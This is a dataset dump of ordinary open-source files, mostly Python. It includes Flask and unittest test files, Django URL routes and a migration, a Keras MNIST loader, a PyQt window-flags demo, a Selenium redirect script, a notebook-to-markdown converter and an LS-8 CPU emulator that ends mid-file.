+{"seq_id":"426133752","text":"from app import createapp\nimport unittest\nimport json\n\nfrom app.api.v1.models.officemodels import OFFICES\n\n\nclass RoutesBaseTest(unittest.TestCase):\n    def setUp(self):\n        self.app = createapp()\n        self.client = self.app.test_client()\n        self.office1 = {\n            \"type\": \"Member of Parliament\",\n            \"name\": \"MP Nairobi\"\n        }\n        self.erroroffice = {\n        }\n    # tear down test\n\n    def tearDown(self):\n        \"\"\"Final cleanup after tests run\"\"\"\n        self.app.testing = False\n\n\nclass TestOfficesEndPoints(RoutesBaseTest):\n\n    def test_view_all_offices(self):\n        response = self.client.get(\"api/v1/offices\")\n        self.assertEqual(response.status_code, 200)\n        result = json.loads(response.data.decode('utf-8'))\n        self.assertEqual(result[\"data\"], [{\n            \"name\": \"dsd\",\n            \"type\": \"trtr\",\n            \"id\": 23\n        }])\n        self.assertEqual(result[\"status\"], 200)\n\n    def test_view_specific_undefined_office(self):\n        response = self.client.get(\"api/v1/offices/12\")\n        result = json.loads(response.data.decode(\"utf-8\"))\n        self.assertEqual(result[\"status\"], 404)\n\n    def test_create_office(self):\n        res = self.client.post(\"api/v1/offices\", data=json.dumps({\n            \"name\": 
\"dsd\",\n \"type\": \"trtr\",\n \"id\": 23\n }), content_type=\"application/json\")\n result = json.loads(res.data.decode(\"utf-8\"))\n self.assertEqual(result[\"status\"], 201)\n self.assertEqual(result[\"data\"], [{'id': 23, 'name':\n 'dsd', 'type': 'trtr'}])\n\n def test_create_office_with_bad_request(self):\n res = self.client.post(\"api/v1/offices\", data=json.dumps({\n \"name\": \"dsd\",\n \"type\": \"trtr\"\n }), content_type=\"application/json\")\n result = json.loads(res.data.decode(\"utf-8\"))\n self.assertEqual(result[\"status\"], 400)\n self.assertEqual(result['error'], 'Must provide id, name and type')\n\n def test_edit_office_not_found(self):\n response = self.client.get(\"api/v1/offices\")\n self.assertEqual(response.status_code, 200)\n result = json.loads(response.data.decode('utf-8'))\n self.assertEqual(result[\"status\"], 200)\n self.assertEqual(result[\"data\"], [{'id': 23, 'name':\n 'dsd', 'type': 'trtr'}])\n","sub_path":"tests/test_office_routes.py","file_name":"test_office_routes.py","file_ext":"py","file_size_in_byte":2457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"605214437","text":"r\"\"\"Test `lmp.util._dataset._preprocess_wiki_tokens`.\n\nUsage:\n python -m unittest test.lmp.util._dataset.test_preprocess_wiki_tokens\n\"\"\"\n\n# built-in modules\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport inspect\nimport math\nimport os\nimport unittest\n\n# self-made modules\n\nimport lmp.path\nimport lmp.util\n\n\n# pylint: disable=W0212\nclass TestPreprocessWikiTokens(unittest.TestCase):\n r\"\"\"Test case of `lmp.util._dataset._preprocess_news_collection`\"\"\"\n\n def test_signature(self):\n r\"\"\"Ensure signature consistency.\"\"\"\n msg = 'Inconsistent method signature.'\n self.assertEqual(\n inspect.signature(lmp.util._dataset._preprocess_wiki_tokens),\n inspect.Signature(\n parameters=[\n inspect.Parameter(\n name='split',\n kind=inspect.Parameter.POSITIONAL_OR_KEYWORD,\n annotation=str,\n default=inspect.Parameter.empty\n )\n ],\n return_annotation=lmp.dataset.LanguageModelDataset\n ),\n msg=msg\n )\n\n def test_invaild_input_split(self):\n r\"\"\"Raise exception when input `split` is invalid.\"\"\"\n msg1 = (\n 'Must raise `TypeError` or `FileNotFoundError` when input `split` '\n 'is invaild.'\n )\n msg2 = 'Inconsistent error message.'\n examples = (\n False, True, 0, 1, -1, 0.0, 1.0, math.nan, -math.nan, math.inf,\n -math.inf, 0j, 1j, b'', (), [], {}, set(), object(), lambda x: x,\n type, None, NotImplemented, ..., 'NotExistFile'\n )\n\n for invaild_input in examples:\n with self.assertRaises(\n (FileNotFoundError, TypeError),\n msg=msg1\n ) as ctx_man:\n lmp.util._dataset._preprocess_wiki_tokens(invaild_input)\n\n if isinstance(ctx_man.exception, TypeError):\n self.assertEqual(\n ctx_man.exception.args[0],\n '`split` must be an instance of `str`.',\n msg=msg2\n )\n else:\n file_path = os.path.join(\n f'{lmp.path.DATA_PATH}',\n f'wiki.{invaild_input}.tokens'\n )\n self.assertEqual(\n ctx_man.exception.args[0],\n f'file {file_path} does not exist.',\n msg=msg2\n )\n\n def test_return_type(self):\n r\"\"\"Return `lmp.dataset.LanguageModelDataset`\"\"\"\n msg = 'Must return `lmp.dataset.LanguageModelDataset`.'\n split_parameter = ('train', 'valid', 'test')\n\n for split in split_parameter:\n dataset = lmp.util._dataset._preprocess_wiki_tokens(split)\n self.assertIsInstance(\n dataset,\n 
lmp.dataset.LanguageModelDataset,\n msg=msg\n )\n# pylint: enable=W0212\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"test/lmp/util/_dataset/test_preprocess_wiki_tokens.py","file_name":"test_preprocess_wiki_tokens.py","file_ext":"py","file_size_in_byte":3171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"459862798","text":"from feeds import Events_Feed, Topics_Feed, Posts_Feed\nfrom django.conf.urls.defaults import patterns, url\n\nevent_patterns = patterns('core.views',\n url(r'^$', 'event_list', name='event_list'),\n url(r'^join/?$', 'join_event'),\n url(r'^checkin$', 'checkin', name='event_checkin'),\n url(r'^(?P\\d+)$', 'event', name='event'),\n)\n\ntopic_patterns = patterns('core.views',\n url(r'^$', 'topic_list', name='topic_list'),\n url(r'^(?P\\d+)$', 'topic', name='topic'),\n url(r'^new/?$', 'submit_topic', name='submit_new_topic'),\n url(r'^(?P\\d+)/edit/?$', 'edit_topic', name='edit_topic'),\n url(r'^(?P\\d+)/vote$', 'vote'),\n url(r'^(?P\\d+)/votes$', 'votes_for_topic', name='vote_for_topic'),\n)\n\nfeed_patterns = patterns('core.views',\n url(r'^event/?$', Events_Feed(), name=\"feed_events\"),\n url(r'^topic/?$', Topics_Feed(), name=\"feed_topics\"),\n url(r'^post/?$', Posts_Feed(), name=\"feed_posts\"),\n)\n\npost_patterns = patterns('core.views',\n url(r'^$', 'list_post', name='list_post'),\n url(r'^(?P\\d+)$', 'view_post', name='view_post'),\n url(r'^(?P.*)$', 'view_post_by_name', name='view_post_by_name'),\n)\n\nwordpress_redirect_patterns = patterns('core.views',\n url(r'^(?P.*)$', 'redirect_wordpress_post', name='redirect_wordpress_post'),\n)\n\nabout_patterns = patterns('django.views.generic.simple',\n url(r'^/?$', 'direct_to_template', {'template': 'core/about.html', 'extra_context':{'tab':'about'}}, name=\"about\"),\n)\n","sub_path":"apps/core/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"80469178","text":"#sum function definition \n#Output: Sum first element with each element of seq = [0,1, 2, 3, 4] Sum= 10\ndef sum(seq):\n if not seq:\n return 0\n else:\n return seq[0] + sum(seq[1:])\n\n#Fold Right function definition. 
if the list seq ist empty the initial value will be init.\n#if list is not empty the funtion output will be: foldr f z (x:xs) = f x (foldr f z xs)\ndef foldr(func, init, seq):\n if not seq:\n return init\n else:\n return func(seq[0], foldr(func, init, seq[1:]))\n\n#Output Sum using the funktion foldr \ndef sum_with_foldr(seq):\n return foldr(lambda seqval, acc: seqval + acc, 0, seq)\n\n\n\n#------------------------------ Testing --------------------------------#\n\nimport unittest\n\n\nclass TestFold(unittest.TestCase):\n def test_sum(self):\n self.assertEqual(sum([0,1, 2, 3, 4]), 10)\n self.assertEqual(sum([12]), 12)\n self.assertEqual(sum([]), 0)\n\n self.assertEqual(sum_with_foldr([0, 1, 2, 3, 4]), 10)\n self.assertEqual(sum_with_foldr([12]), 12)\n self.assertEqual(sum_with_foldr([]), 0)\n\n \nif __name__ == '__main__':\n unittest.main()\n\n","sub_path":"fold_implementation.py","file_name":"fold_implementation.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"65548508","text":"import os\nimport re\nimport subprocess\nimport argparse\nimport pathlib\n\nparser = argparse.ArgumentParser()\nparser.add_argument('ipynb_path', type=str)\nargs = parser.parse_args()\n\n\n'''\nInput paths\n'''\nthis_script_dir: str = os.path.abspath(pathlib.Path(__file__).parent.resolve())\nipynb_file_name: str = os.path.basename(args.ipynb_path)\nconfig_script_path: str = os.path.join(this_script_dir, 'nbconvert_config.py')\n'''\nOutput paths\n'''\noutput_abs_dir: str = os.path.abspath(pathlib.Path(args.ipynb_path).parent.resolve()) # '/Users/Desktop/_posts/YYYY-MM-DD-post-name/'\noutput_relative_dir: str = '/'.join(args.ipynb_path.split('/')[:-1]) # '_posts/YYYY-MM-DD-post-name/'\noutput_image_abs_dir: str = os.path.abspath(os.path.join(output_abs_dir, 'markdown_images/')) # '/Users/Desktop/_posts/YYYY-MM-DD-post-name/markdown_images/'\noutput_image_relative_dir: str = os.path.join(output_relative_dir, 'markdown_images/') # '_posts/YYYY-MM-DD-post-name/markdown_images/'\nbase_file_name_with_date_prefix: str = ipynb_file_name.lower().replace(' ', '-').replace('.ipynb', '') # 'YYYY-MM-DD-post-name'\nbase_file_name: str = re.sub(r'^\\d{4}\\-\\d{2}\\-\\d{2}\\-', '', base_file_name_with_date_prefix) # 'YYYY-MM-DD-post-name' => 'post-name'\noutput_markdown_abs_path: str = os.path.join(output_abs_dir, base_file_name + '.md') # '/Users/Desktop/_posts/YYYY-MM-DD-post-name/post-name.md'\njekyll_markdown_abs_path: str = os.path.join(output_abs_dir, base_file_name_with_date_prefix + '.md') # '/Users/Desktop/_posts/YYYY-MM-DD-post-name/YYYY-MM-DD-post-name.md'\n\nprint(f\"Converting {ipynb_file_name} => {os.path.basename(jekyll_markdown_abs_path)}\")\nsubprocess.run([\"jupyter\", \"nbconvert\", args.ipynb_path, \"--to\", \"markdown\", \"--config\", config_script_path])\n\n# Clean up markdown\nwith open(output_markdown_abs_path, 'r') as fd:\n md = fd.read()\nmd_clean = md\n\n# HTML cleanup\n# Remove %s'\n ''\n ''\n )\n\n css = shell(['cleancss', 'src/theme/%s.css' % theme])\n\n with open('src/card.js', 'rb') as f:\n content = f.read()\n # use real API url\n content = content.replace('http://localhost:8001', 'https://cr-inn.com')\n\n js = shell(['uglifyjs', '-m'], content)\n\n out = html % (css, tinyhtml(template), js)\n with open('jsdelivr/theme/%s.html' % theme, 'wb') as f:\n f.write(out)\n\n\ndef create_widget():\n with open('package.json') as f:\n pkg = json.load(f)\n\n url = '//cdn.jsdelivr.net/zhihu-card/%s/' % 
pkg['version']\n\n with open('src/widget.js') as f:\n content = f.read()\n content = content.replace('replacethis', url)\n\n js = shell(['uglifyjs', '-m'], content)\n with open('jsdelivr/widget.js', 'wb') as f:\n f.write(js)\n\ncreate_widget()\n\nif not os.path.isdir('jsdelivr/theme'):\n os.makedirs('jsdelivr/theme')\n\ncreate_card('zhihu')\ncreate_card('github')\n\n ","sub_path":"build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":2269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"448192054","text":"from keras.datasets import mnist\nfrom keras.utils import np_utils\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Activation\nfrom keras.models import model_from_json, model_from_yaml\nimport matplotlib.pyplot as plt\n\n(X_train, y_train), (X_test, y_test) = mnist.load_data()\n\ninput_dim = 784 #28*28\noutput_dim = nb_classes = 10\nX_train = X_train.reshape(60000, input_dim)\nX_test = X_test.reshape(10000, input_dim)\nX_train = X_train.astype('float32')\nX_test = X_test.astype('float32')\nX_train /= 255\nX_test /= 255\n\n# convert class vectors to binary class matrices\n\nY_train = np_utils.to_categorical(y_train, nb_classes)\nY_test = np_utils.to_categorical(y_test, nb_classes)\n\nprint(\"X size\", X_train.shape)\nprint(\"Y size\", Y_train.shape)\n\n\n\n\nmodel = model_from_json(open('mnist_Logistic_model.json').read())# if json\n# model = model_from_yaml(open('mnist_Logistic_model.yaml').read())# if yaml\nmodel.load_weights('mnist_Logistic_wts.h5')\n\n\n\n\ntest = X_test[0].reshape(-1,784)\nprint(\"result is\",model.predict(test))\nplt.imshow(test.reshape(28,28))\nplt.show()\n","sub_path":"winterns/poolaidhamilton/keras/classify_mnist.py","file_name":"classify_mnist.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"310881474","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n# converted from C++ by blindvic\r\n\"\"\"\r\nPyQt version of Window Flags Example\r\nhttp://doc.trolltech.com/4.6/widgets-windowflags.html\r\n\"\"\"\r\n\r\nimport sys, os\r\n\r\nfrom PyQt4.QtCore import *\r\nfrom PyQt4.QtGui import *\r\n\r\nclass PreviewWindow ( QWidget ) :\r\n\tdef __init__ ( self, parent = None ) :\r\n\t\tQWidget.__init__ ( self, parent )\r\n\t\tself.textEdit = QTextEdit ()\r\n\t\tself.textEdit.setReadOnly ( True )\r\n\t\tself.textEdit.setLineWrapMode ( QTextEdit.NoWrap )\r\n\r\n\t\tself.closeButton = QPushButton ( \"&Close\" )\r\n\t\tself.closeButton.clicked.connect ( self.close )\r\n\r\n\t\tlayout = QVBoxLayout ()\r\n\t\tlayout.addWidget ( self.textEdit )\r\n\t\tlayout.addWidget ( self.closeButton )\r\n\t\tself.setLayout ( layout )\r\n\r\n\t\tself.setWindowTitle ( \"Preview\" )\r\n\r\n\tdef setWindowFlags ( self, flags ) :\r\n\r\n\t\tQWidget.setWindowFlags ( self, flags )\r\n\r\n\t\ttext = \"\"\r\n\r\n\t\ttype = flags & Qt.WindowType_Mask\r\n\t\tif type == Qt.Window :\r\n\t\t\ttext = \"Qt.Window\"\r\n\t\telif type == Qt.Dialog :\r\n\t\t\ttext = \"Qt.Dialog\"\r\n\t\telif type == Qt.Sheet :\r\n\t\t\ttext = \"Qt.Sheet\"\r\n\t\telif type == Qt.Drawer :\r\n\t\t\ttext = \"Qt.Drawer\"\r\n\t\telif type == Qt.Popup :\r\n\t\t\ttext = \"Qt.Popup\"\r\n\t\telif type == Qt.Tool :\r\n\t\t\ttext = \"Qt.Tool\"\r\n\t\telif type == Qt.ToolTip :\r\n\t\t\ttext = \"Qt.ToolTip\"\r\n\t\telif type == Qt.SplashScreen :\r\n\t\t\ttext = \"Qt.SplashScreen\"\r\n\r\n\t\tif flags & Qt.MSWindowsFixedSizeDialogHint 
:\r\n\t\t\ttext += \"\\n| Qt.MSWindowsFixedSizeDialogHint\"\r\n\t\tif flags & Qt.X11BypassWindowManagerHint :\r\n\t\t\ttext += \"\\n| Qt.X11BypassWindowManagerHint\"\r\n\t\tif flags & Qt.FramelessWindowHint :\r\n\t\t\ttext += \"\\n| Qt.FramelessWindowHint\"\r\n\t\tif flags & Qt.WindowTitleHint :\r\n\t\t\ttext += \"\\n| Qt.WindowTitleHint\"\r\n\t\tif flags & Qt.WindowSystemMenuHint :\r\n\t\t\ttext += \"\\n| Qt.WindowSystemMenuHint\"\r\n\t\tif flags & Qt.WindowMinimizeButtonHint :\r\n\t\t\ttext += \"\\n| Qt.WindowMinimizeButtonHint\"\r\n\t\tif flags & Qt.WindowMaximizeButtonHint :\r\n\t\t\ttext += \"\\n| Qt.WindowMaximizeButtonHint\"\r\n\t\tif flags & Qt.WindowCloseButtonHint :\r\n\t\t\ttext += \"\\n| Qt.WindowCloseButtonHint\"\r\n\t\tif flags & Qt.WindowContextHelpButtonHint :\r\n\t\t\ttext += \"\\n| Qt.WindowContextHelpButtonHint\"\r\n\t\tif flags & Qt.WindowShadeButtonHint :\r\n\t\t\ttext += \"\\n| Qt.WindowShadeButtonHint\"\r\n\t\tif flags & Qt.WindowStaysOnTopHint :\r\n\t\t\ttext += \"\\n| Qt.WindowStaysOnTopHint\"\r\n\t\tif flags & Qt.CustomizeWindowHint :\r\n\t\t\ttext += \"\\n| Qt.CustomizeWindowHint\"\r\n\r\n\t\tself.textEdit.setPlainText ( text )\r\n\r\n\r\nclass ControllerWindow ( QWidget ) :\r\n\r\n\tdef __init__ ( self, parent = None ) :\r\n\t\tQWidget.__init__ ( self, parent )\r\n\r\n\t\tself.previewWindow = PreviewWindow ( self )\r\n\r\n\t\tself.createTypeGroupBox ()\r\n\t\tself.createHintsGroupBox ()\r\n\r\n\t\tself.quitButton = QPushButton ( \"&Quit\" )\r\n\t\tself.quitButton.clicked.connect ( self.close )\r\n\r\n\t\tbottomLayout = QHBoxLayout ()\r\n\t\tbottomLayout.addStretch ()\r\n\t\tbottomLayout.addWidget ( self.quitButton )\r\n\r\n\t\tmainLayout = QVBoxLayout ()\r\n\t\tmainLayout.addWidget ( self.typeGroupBox )\r\n\t\tmainLayout.addWidget ( self.hintsGroupBox )\r\n\t\tmainLayout.addLayout ( bottomLayout )\r\n\t\tself.setLayout ( mainLayout )\r\n\r\n\t\tself.setWindowTitle ( \"Window Flags\" )\r\n\t\tself.updatePreview ()\r\n\r\n\tdef updatePreview ( self ) :\r\n\t\tflags = 0\r\n\r\n\t\tif self.windowRadioButton.isChecked () :\r\n\t\t\tflags = Qt.Window\r\n\t\telif self.dialogRadioButton.isChecked () :\r\n\t\t\tflags = Qt.Dialog\r\n\t\telif self.sheetRadioButton.isChecked () :\r\n\t\t\tflags = Qt.Sheet\r\n\t\telif self.drawerRadioButton.isChecked () :\r\n\t\t\tflags = Qt.Drawer\r\n\t\telif self.popupRadioButton.isChecked () :\r\n\t\t\tflags = Qt.Popup\r\n\t\telif self.toolRadioButton.isChecked () :\r\n\t\t\tflags = Qt.Tool\r\n\t\telif self.toolTipRadioButton.isChecked () :\r\n\t\t\tflags = Qt.ToolTip\r\n\t\telif self.splashScreenRadioButton.isChecked () :\r\n\t\t\tflags = Qt.SplashScreen\r\n\r\n\t\tif self.msWindowsFixedSizeDialogCheckBox.isChecked () :\r\n\t\t\tflags |= Qt.MSWindowsFixedSizeDialogHint\r\n\t\tif self.x11BypassWindowManagerCheckBox.isChecked () :\r\n\t\t\tflags |= Qt.X11BypassWindowManagerHint\r\n\t\tif self.framelessWindowCheckBox.isChecked () :\r\n\t\t\tflags |= Qt.FramelessWindowHint\r\n\t\tif self.windowTitleCheckBox.isChecked () :\r\n\t\t\tflags |= Qt.WindowTitleHint\r\n\t\tif self.windowSystemMenuCheckBox.isChecked () :\r\n\t\t\tflags |= Qt.WindowSystemMenuHint\r\n\t\tif self.windowMinimizeButtonCheckBox.isChecked () :\r\n\t\t\tflags |= Qt.WindowMinimizeButtonHint\r\n\t\tif self.windowMaximizeButtonCheckBox.isChecked () :\r\n\t\t\tflags |= Qt.WindowMaximizeButtonHint\r\n\t\tif self.windowCloseButtonCheckBox.isChecked () :\r\n\t\t\tflags |= Qt.WindowCloseButtonHint\r\n\t\tif self.windowContextHelpButtonCheckBox.isChecked () :\r\n\t\t\tflags |= 
Qt.WindowContextHelpButtonHint\r\n\t\tif self.windowShadeButtonCheckBox.isChecked () :\r\n\t\t\tflags |= Qt.WindowShadeButtonHint\r\n\t\tif self.windowStaysOnTopCheckBox.isChecked () :\r\n\t\t\tflags |= Qt.WindowStaysOnTopHint\r\n\t\tif self.windowStaysOnBottomCheckBox.isChecked () :\r\n\t\t\tflags |= Qt.WindowStaysOnBottomHint\r\n\t\tif self.customizeWindowHintCheckBox.isChecked () :\r\n\t\t\tflags |= Qt.CustomizeWindowHint\r\n\r\n\t\tself.previewWindow.setWindowFlags ( flags )\r\n\r\n\t\tpos = self.previewWindow.pos ()\r\n\t\tif pos.x () < 0 :\r\n\t\t\tpos.setX ( 0 )\r\n\t\tif pos.y () < 0 :\r\n\t\t\tpos.setY ( 0 )\r\n\t\tself.previewWindow.move ( pos )\r\n\t\tself.previewWindow.show ()\r\n\r\n\r\n\tdef createTypeGroupBox ( self ) :\r\n\t\tself.typeGroupBox = QGroupBox ( \"Type\" )\r\n\r\n\t\tself.windowRadioButton = self.createRadioButton ( \"Window\" )\r\n\t\tself.dialogRadioButton = self.createRadioButton ( \"Dialog\" )\r\n\t\tself.sheetRadioButton = self.createRadioButton ( \"Sheet\" )\r\n\t\tself.drawerRadioButton = self.createRadioButton ( \"Drawer\" )\r\n\t\tself.popupRadioButton = self.createRadioButton ( \"Popup\" )\r\n\t\tself.toolRadioButton = self.createRadioButton ( \"Tool\" )\r\n\t\tself.toolTipRadioButton = self.createRadioButton ( \"Tooltip\" )\r\n\t\tself.splashScreenRadioButton = self.createRadioButton ( \"Splash screen\" )\r\n\t\tself.windowRadioButton.setChecked ( True )\r\n\r\n\t\tlayout = QGridLayout ()\r\n\t\tlayout.addWidget ( self.windowRadioButton, 0, 0 )\r\n\t\tlayout.addWidget ( self.dialogRadioButton, 1, 0 )\r\n\t\tlayout.addWidget ( self.sheetRadioButton, 2, 0 )\r\n\t\tlayout.addWidget ( self.drawerRadioButton, 3, 0 )\r\n\t\tlayout.addWidget ( self.popupRadioButton, 0, 1 )\r\n\t\tlayout.addWidget ( self.toolRadioButton, 1, 1 )\r\n\t\tlayout.addWidget ( self.toolTipRadioButton, 2, 1 )\r\n\t\tlayout.addWidget ( self.splashScreenRadioButton, 3, 1 )\r\n\t\tself.typeGroupBox.setLayout ( layout )\r\n\r\n\tdef createRadioButton ( self, text ) :\r\n\t\tbutton = QRadioButton ( text )\r\n\t\tbutton.clicked.connect ( self.updatePreview )\r\n\t\treturn button\r\n\r\n\tdef createHintsGroupBox ( self ) :\r\n\t\tself.hintsGroupBox = QGroupBox ( \"Hints\" )\r\n\r\n\t\tself.msWindowsFixedSizeDialogCheckBox = self.createCheckBox ( \"MS Windows fixed size dialog\" )\r\n\t\tself.x11BypassWindowManagerCheckBox = self.createCheckBox ( \"X11 bypass window manager\" )\r\n\t\tself.framelessWindowCheckBox = self.createCheckBox ( \"Frameless window\")\r\n\t\tself.windowTitleCheckBox = self.createCheckBox ( \"Window title\" )\r\n\t\tself.windowSystemMenuCheckBox = self.createCheckBox ( \"Window system menu\" )\r\n\t\tself.windowMinimizeButtonCheckBox = self.createCheckBox ( \"Window minimize button\" )\r\n\t\tself.windowMaximizeButtonCheckBox = self.createCheckBox ( \"Window maximize button\" )\r\n\t\tself.windowCloseButtonCheckBox = self.createCheckBox ( \"Window close button\" )\r\n\t\tself.windowContextHelpButtonCheckBox = self.createCheckBox ( \"Window context help button\" )\r\n\t\tself.windowShadeButtonCheckBox = self.createCheckBox ( \"Window shade button\" )\r\n\t\tself.windowStaysOnTopCheckBox = self.createCheckBox ( \"Window stays on top\" )\r\n\t\tself.windowStaysOnBottomCheckBox = self.createCheckBox ( \"Window stays on bottom\" )\r\n\t\tself.customizeWindowHintCheckBox = self.createCheckBox ( \"Customize window\" )\r\n\r\n\t\tlayout = QGridLayout ()\r\n\t\tlayout.addWidget ( self.msWindowsFixedSizeDialogCheckBox, 0, 0 )\r\n\t\tlayout.addWidget ( 
self.x11BypassWindowManagerCheckBox, 1, 0 )\r\n\t\tlayout.addWidget ( self.framelessWindowCheckBox, 2, 0 )\r\n\t\tlayout.addWidget ( self.windowTitleCheckBox, 3, 0 )\r\n\t\tlayout.addWidget ( self.windowSystemMenuCheckBox, 4, 0 )\r\n\t\tlayout.addWidget ( self.windowMinimizeButtonCheckBox, 0, 1 )\r\n\t\tlayout.addWidget ( self.windowMaximizeButtonCheckBox, 1, 1 )\r\n\t\tlayout.addWidget ( self.windowCloseButtonCheckBox, 2, 1 )\r\n\t\tlayout.addWidget ( self.windowContextHelpButtonCheckBox, 3, 1 )\r\n\t\tlayout.addWidget ( self.windowShadeButtonCheckBox, 4, 1 )\r\n\t\tlayout.addWidget ( self.windowStaysOnTopCheckBox, 5, 1 )\r\n\t\tlayout.addWidget ( self.windowStaysOnBottomCheckBox, 6, 1 )\r\n\t\tlayout.addWidget ( self.customizeWindowHintCheckBox, 5, 0 )\r\n\t\tself.hintsGroupBox.setLayout ( layout )\r\n\r\n\r\n\tdef createCheckBox ( self, text ) :\r\n\t\tcheckBox = QCheckBox ( text )\r\n\t\tcheckBox.clicked.connect ( self.updatePreview )\r\n\t\treturn checkBox\r\n\r\n\r\ndef main () :\r\n\t#app = QApplication ( sys.argv )\r\n\tglobal controller\r\n\tcontroller= ControllerWindow ()\r\n\tcontroller.show ()\r\n\t#sys.exit ( app.exec_ () )\r\n\r\nif __name__ == '__main__' : main()","sub_path":"win.py","file_name":"win.py","file_ext":"py","file_size_in_byte":8844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"27413604","text":"from selenium import webdriver\nimport time\n# from selenium.common.exceptions import StaleElementReferenceException\nfrom selenium.common.exceptions import StaleElementReferenceException\n\n\ndef waitForLoad(driver):\n elem = driver.find_element_by_tag_name(\"div\")\n count = 0\n while True:\n count += 1\n if count > 20:\n print('10s past .no tiaozhuan ')\n break\n time.sleep(.5)\n try:\n driver.find_element_by_tag_name(\"div\")\n except:\n print('start tiaozhuan')\n break\n\ndriver = webdriver.PhantomJS(\n executable_path=r'D:\\Program Files\\phantomjs\\bin\\phantomjs')\ndriver.get(\"http://pythonscraping.com/pages/javascript/redirectDemo1.html\")\nwaitForLoad(driver)\nprint(driver.page_source)\ndriver.close()\n","sub_path":"text2.py","file_name":"text2.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"424278091","text":"class Stats():\n def __init__(self):\n self.insert = 0\n self.load = 0\n self.delete = 0\n self.find = 0\n self.min = 0\n self.max = 0\n self.successor = 0\n self.inorder = 0\n self.compare = 0\n self.elements = 0\n self.max_elements = 0\n \n def set_max_elements(self):\n if self.elements > self.max_elements:\n self.max_elements = self.elements\n\ndef process_key(w):\n if not ((64 < ord(w[0]) < 91) or (96 < ord(w[0]) < 123)):\n w = w[1:]\n if w != '':\n if not ((64 < ord(w[-1]) < 91) or (96 < ord(w[-1]) < 123)):\n w = w[:-1]\n return w","sub_path":"l3/z2/Stats.py","file_name":"Stats.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"331115382","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('usuario', '0001_initial'),\n ('subasta', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Oferta',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('fecha', 
models.DateTimeField(auto_now_add=True)),\n ('motivo', models.CharField(max_length=512)),\n ('monto', models.CharField(max_length=5)),\n ('ganador', models.BooleanField(default=False)),\n ('borrado', models.BooleanField(default=False)),\n ('disponible', models.BooleanField(default=True)),\n ('postor', models.ForeignKey(to='usuario.Usuario', null=True)),\n ('subasta', models.ForeignKey(to='subasta.Subasta', null=True)),\n ],\n ),\n ]\n","sub_path":"bestnid/bestnid/apps/oferta/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"487610915","text":"\"\"\"CPU functionality.\"\"\"\n\nimport sys\n\n# instruction codes\nHLT = 0b00000001 # halt\nLDI = 0b10000010 # sets a specified register to a value\nPRN = 0b01000111 # print\nADD = 0b10100000 # add\nSUB = 0b10100001 # subtract\nMUL = 0b10100010 # multiply\nINC = 0b01100101 # increment\nDEC = 0b01100110 # decrement\nPUSH = 0b01000101 # push onto stack\nPOP = 0b01000110 # pop off the stack\nCALL = 0b01010000 # call\nRET = 0b00010001 # return\nCMP = 0b10100111 # compare\nJMP = 0b01010100 # jump\nJEQ = 0b01010101 # equal\nJNE = 0b01010110 # not equal\nOOI = 0b00000111 # prevent out of index\nLIM = 0b11111111 # limit values\n\n\nclass CPU:\n \"\"\"Main CPU class.\"\"\"\n\n def __init__(self):\n \"\"\"Construct a new CPU.\"\"\"\n # ram holds 256 bytes of memory\n self.ram = [0] * 256\n # holding 8 general-purpose registers\n self.reg = [0] * 8\n # program counter (pc)\n self.pc = 0\n # stack pointer (sp)\n self.sp = 7\n # CPU running\n self.running = True\n\n def ram_read(self, address):\n # return the ram at the specified, indexed address\n return self.ram[address]\n\n # defining a function to overwrite the ram value at the given address\n def ram_write(self, value, address):\n # set the ram at the specified, indexed address, as the value\n self.ram[address] = value\n\n def load(self, filename=None):\n \"\"\"Load a program into memory.\"\"\"\n\n address = 0\n\n # if cpu not being fed 2 files (file_to_run, file_to_load)\n if len(sys.argv) != 2:\n print(\"Usage: cpu.py loaded_program_name.ls8\")\n\n # open the file\n try: # catch FileNotFound errors\n with open(filename, 'r') as f:\n for line in f:\n # only take code to the left of any comments\n line = line.split(\"#\")[0].strip()\n # Skip past empty lines and commented lines\n if line == '' or line[0][0] == '#':\n continue\n # Since we're working in binary, have to set base to 2\n try:\n self.ram[address] = int(line, 2)\n # Raise error if not fed appropriate int\n except ValueError:\n print(f'Invalid number: {line}')\n sys.exit(1)\n address += 1\n except FileNotFoundError:\n print(f\"Could not find file: {sys.argv[1]}\")\n sys.exit(1)\n\n def alu(self, op, reg_a, reg_b):\n \"\"\"ALU operations.\"\"\"\n\n reg_a = reg_a & OOI\n reg_b = reg_b & OOI\n if op == \"ADD\":\n self.reg[reg_a] += self.reg[reg_b]\n elif op == \"SUB\":\n self.reg[reg_a] -= self.reg[reg_b]\n elif op == \"MUL\":\n self.reg[reg_a] *= self.reg[reg_b]\n elif op == \"INC\": # INC\n 